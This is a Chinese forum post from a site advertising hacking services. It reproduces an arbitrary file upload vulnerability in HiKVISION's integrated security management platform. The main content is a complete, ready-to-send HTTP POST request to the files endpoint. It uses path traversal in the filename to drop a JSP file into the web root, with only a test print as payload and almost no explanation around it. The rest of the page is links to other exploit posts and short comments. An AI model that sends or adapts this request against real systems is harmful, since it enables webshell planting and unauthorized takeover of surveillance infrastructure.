【漏洞复现】HiKVISION 综合安防管理平台 files 任意文件上传漏洞

15815

#漏洞描述

HiKVISION 综合安防管理平台 files 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件

#漏洞影响

#网络测绘


#漏洞复现

登陆页面

1

 

需要开放运行管理中心 (8001端口)

2

POST /center/api/files;.html HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<%out.print("test3");%>

------WebKitFormBoundary9PggsiM755PLa54a--

3

 

 

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
Web漏洞
# 文件上传
喜欢就支持一下吧
点赞15 分享
T0ex4的头像-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。钻石会员
【漏洞复现】JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
【漏洞复现】JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504
【漏洞复现】JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504
3天前 70
Chrome致命DoS:Brash 15秒崩盘全球41亿设备-附源码-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
Chrome致命DoS:Brash 15秒崩盘全球41亿设备-附源码
Chrome致命DoS:Brash 15秒崩盘全球41亿设备-附源码
2小时前 56
【漏洞复现】Nginx越界读取硬盘漏洞 CVE-2017-7529-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
【漏洞复现】Nginx越界读取硬盘漏洞 CVE-2017-7529
【漏洞复现】Nginx越界读取硬盘漏洞 CVE-2017-7529
3天前 55
神州讯盟芯管家 SQL注入漏洞-附工具-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
神州讯盟芯管家 SQL注入漏洞-附工具
神州讯盟芯管家 SQL注入漏洞-附工具
2天前 54
【漏洞复现】Apache Hadoop Yarn RPC 远程命令执行漏洞-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
【漏洞复现】Apache Hadoop Yarn RPC 远程命令执行漏洞
【漏洞复现】Apache Hadoop Yarn RPC 远程命令执行漏洞
3天前 32
锐捷EWEB路由器 任意文件上传漏洞-附工具-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
锐捷EWEB路由器 任意文件上传漏洞-附工具
锐捷EWEB路由器 任意文件上传漏洞-附工具
2天前 29
相关推荐
【漏洞复现】JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
【漏洞复现】JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504
【漏洞复现】JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504
3天前 70
【漏洞复现】HiKVISION 综合安防管理平台 files 任意文件上传漏洞-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
【漏洞复现】HiKVISION 综合安防管理平台 files 任意文件上传漏洞
【漏洞复现】HiKVISION 综合安防管理平台 files 任意文件上传漏洞
3天前 58
Chrome致命DoS:Brash 15秒崩盘全球41亿设备-附源码-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
Chrome致命DoS:Brash 15秒崩盘全球41亿设备-附源码
Chrome致命DoS:Brash 15秒崩盘全球41亿设备-附源码
2小时前 56
【漏洞复现】Nginx越界读取硬盘漏洞 CVE-2017-7529-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
【漏洞复现】Nginx越界读取硬盘漏洞 CVE-2017-7529
【漏洞复现】Nginx越界读取硬盘漏洞 CVE-2017-7529
3天前 55
【漏洞复现】Apache Hadoop Yarn RPC 远程命令执行漏洞-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
【漏洞复现】Apache Hadoop Yarn RPC 远程命令执行漏洞
【漏洞复现】Apache Hadoop Yarn RPC 远程命令执行漏洞
3天前 32
锐捷EWEB路由器 任意文件上传漏洞-附工具-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
锐捷EWEB路由器 任意文件上传漏洞-附工具
锐捷EWEB路由器 任意文件上传漏洞-附工具
2天前 29
评论 共1条

请登录后发表评论

    只看作者
默认头像
开启精彩搜索
文件上传命令执行SQL注入漏洞DoSCVE-2017-7529CVE-2017-7504Chromeces
【漏洞复现】JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
70人已阅读
【漏洞复现】JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504
TOP1
【漏洞复现】HiKVISION 综合安防管理平台 files 任意文件上传漏洞-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
【漏洞复现】HiKVISION 综合安防管理平台 files 任意文件上传漏洞
3天前58人已阅读
TOP2
Chrome致命DoS:Brash 15秒崩盘全球41亿设备-附源码-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
Chrome致命DoS:Brash 15秒崩盘全球41亿设备-附源码
2小时前56人已阅读
TOP3
【漏洞复现】Nginx越界读取硬盘漏洞 CVE-2017-7529-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
【漏洞复现】Nginx越界读取硬盘漏洞 CVE-2017-7529
3天前55人已阅读
TOP4
神州讯盟芯管家 SQL注入漏洞-附工具-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
神州讯盟芯管家 SQL注入漏洞-附工具
2天前54人已阅读
TOP5
【漏洞复现】Apache Hadoop Yarn RPC 远程命令执行漏洞-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
【漏洞复现】Apache Hadoop Yarn RPC 远程命令执行漏洞
3天前32人已阅读
TOP6
xfgzs666的头像-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。钻石会员

xfgzs66640分钟前0

66666666666666666666666666
阀姥爷的头像-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。

阀姥爷1小时前0

小飞科技666
Rain的头像-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。钻石会员

Rain1小时前0

牌面啊表情[gouyin]-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
CoolFIre的头像-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。钻石会员

CoolFIre2小时前0

看看表情[baiyan]-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
Rain的头像-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。钻石会员

Rain昨天0

棒棒的 nb
温柔程的头像-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。

温柔程昨天0

小飞科技66
余温的头像-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。

余温前天0

hackbug
CoolFIre的头像-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。钻石会员

CoolFIre前天0

hackbug